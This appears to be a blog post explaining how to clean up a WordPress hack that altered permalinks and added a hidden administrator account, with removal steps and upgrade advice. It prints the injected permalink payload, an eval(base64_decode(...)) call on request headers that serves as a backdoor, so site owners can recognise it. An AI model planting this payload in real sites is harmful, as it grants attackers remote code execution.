I’ve recently come across a new hacker attack on WordPress blogs. The attack is what’s called an “SQL Injection” attack, which is an exploit to allow a hacker to execute modified SQL code on your blog’s database. The modified code has the effect of changing the values used for all of your blog’s permalinks. In most cases, this modified code simply makes the permalinks useless. But it could potentially be used by the hacker to perform further exploits against your blog, which can be really bad news.

The modified permalink looks something like this:

/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFER ER%5D))%7D%7D|.+)&%/

or this:

/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%



Only self-hosted WordPress installs are affected by this, so if you have a WordPress blog on wordpress.com, you don’t have anything to worry about.

Removal

Removal of the problem can be accomplished in a few steps:

1. Edit your permalinks

Log in to your blog’s administration area and go to the Settings | Permalinks configuration page. You will need to remove the added permalink code and reset the option back to what you had previously configured.

2. Remove additional administrator.

Part of the exploit resulted in a new and “hidden” administrator account being added. Go to the Users configuration page and click on the “Administrator” user type to filter the list of users to Administrators only. You will need to find the most recently added administrator. This can be done by mousing over the “Edit” option for each user and finding the highest user_id value that is displayed in your browser’s status bar. Edit the account with the highest user_id value. When the edit page comes up, modify the URL by adding 1 to the user_id value. So, if the last (highest) user_id value was 38, edit user 38 and then change to user 39 and you will be editing the “hidden” administrator. This user will have a strange first name. Change the name to something else, like “xxx” and then change their Role to “Subscriber,” then click “Update User” to save your changes. Once this is done, you can return to the list of users ,find the same account and delete it.

Further Steps

This fixes the damage done and gets your permalinks working, but will not keep the problem from happening again. To do that, you will have to upgrade to the latest version of WordPress, version 2.8.4. Versions prior to 2.8.4 are susceptible to the attack and you could find yourself going through these steps again.

It’s a good idea to keep current on your WordPress software version all the time, but in this case it’s a requirement in order to avoid being hacked again. So click on the” Please update now” link on the top of your administration screen and you should be good to go from this point forward.